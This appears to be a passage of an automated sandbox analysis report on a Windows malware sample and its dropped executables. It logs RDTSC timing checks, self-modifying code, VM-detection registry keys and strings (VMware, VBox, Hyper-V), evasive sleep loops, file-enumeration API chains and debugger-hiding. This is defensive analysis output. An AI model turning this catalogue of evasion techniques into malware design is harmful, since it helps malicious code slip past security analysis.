Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51B0883 second address: 51B0887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0A5B second address: 51A0A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0A61 second address: 51A0A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0A65 second address: 51A0A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0A69 second address: 51A0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B5348065h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0C97 second address: 51A0C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0C9B second address: 51A0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CB6 second address: 51A0CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B548336Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CE2 second address: 51A0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CE8 second address: 51A0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CEC second address: 51A0CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CFB second address: 51A0CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0CFF second address: 51A0D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0D11 second address: 51A0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0D17 second address: 51A0D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0D1B second address: 51A0D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5483374h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0E9F second address: 51A0EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0EA5 second address: 51A0EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0EA9 second address: 51A0EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0EBA second address: 51A0EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51A0EC0 second address: 51A0F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov esi, 2563C333h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FD0B5348066h 0x00000018 sbb ax, 0F38h 0x0000001d jmp 00007FD0B534805Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9CE65 second address: A9CE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9CE69 second address: A9CE73 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9CE73 second address: A9CE7D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B548336Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A9D17F second address: A9D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 515062D second address: 515063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B548336Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 515063F second address: 51506D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD0B5348066h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edi, si 0x00000016 jmp 00007FD0B534805Ah 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e push esi 0x0000001f jmp 00007FD0B534805Dh 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007FD0B5348061h 0x0000002b adc cl, 00000006h 0x0000002e jmp 00007FD0B5348061h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 jmp 00007FD0B534805Eh 0x0000003c push FFFFFFFEh 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD0B534805Ah 0x00000047 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51506D0 second address: 51506DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51506DF second address: 51506E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Special instruction interceptor: First address: 8EEE25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Special instruction interceptor: First address: A90988 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Special instruction interceptor: First address: B1D76F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E0EE25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FB0988 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 103D76F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Special instruction interceptor: First address: FB3920 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Special instruction interceptor: First address: FB3A15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Special instruction interceptor: First address: 114FADA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Special instruction interceptor: First address: 115F9B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Special instruction interceptor: First address: 11D5544 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Code function: 0_2_051A0DD8 rdtsc 0_2_051A0DD8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1382 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1462 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1459 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 369 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1356 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Window / User API: threadDelayed 2777 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Window / User API: foregroundWindowGot 883 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Window / User API: threadDelayed 909
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Window / User API: threadDelayed 591
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe API coverage: 3.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7732 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716 Thread sleep count: 1382 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716 Thread sleep time: -2765382s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728 Thread sleep count: 1462 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728 Thread sleep time: -2925462s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep count: 1459 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep time: -2919459s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 369 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -11070000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712 Thread sleep count: 1356 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712 Thread sleep time: -2713356s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe TID: 5808 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492 Thread sleep count: 349 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492 Thread sleep count: 909 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 6492 Thread sleep count: 591 > 30
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe TID: 3176 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684 Thread sleep count: 134 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684 Thread sleep count: 341 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe TID: 3684 Thread sleep count: 221 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Thread sleep count: Count: 2777 delay: -10 Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00B8DBBE
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B968EE FindFirstFileW,FindClose, 6_2_00B968EE
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00B9698F
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B8D076
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00B8D3A9
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B99642
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00B9979D
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00B99B2B
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B95C97 FindFirstFileW,FindNextFileW,FindClose, 6_2_00B95C97
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B938B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 20_2_00B938B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 20_2_00B8E430
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 20_2_00B8ED20
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B94910
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B94570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 20_2_00B94570
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B8F6B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 20_2_00B93EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 20_2_00B8DA80
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B816D0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 20_2_00B8DE10
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 20_2_00B8BE70
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00B242DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: 9d7da53f74.exe, 9d7da53f74.exe, 0000003C.00000002.2745204557.0000000001130000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 8ObkdHP9Hq.exe, 00000000.00000003.1723567713.0000000001490000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~,%
Source: skotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000002C.00000002.2630021156.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: 8ObkdHP9Hq.exe, 00000000.00000002.1750930432.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1787198522.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, 9d7da53f74.exe, 00000015.00000002.2522896601.0000000001130000.00000040.00000001.01000000.0000000D.sdmp, 9d7da53f74.exe, 0000003C.00000002.2745204557.0000000001130000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: num.exe, 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 9d7da53f74.exe, 0000003C.00000002.2746326471.000000000170B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: num.exe, 00000014.00000002.2442698783.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWD
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
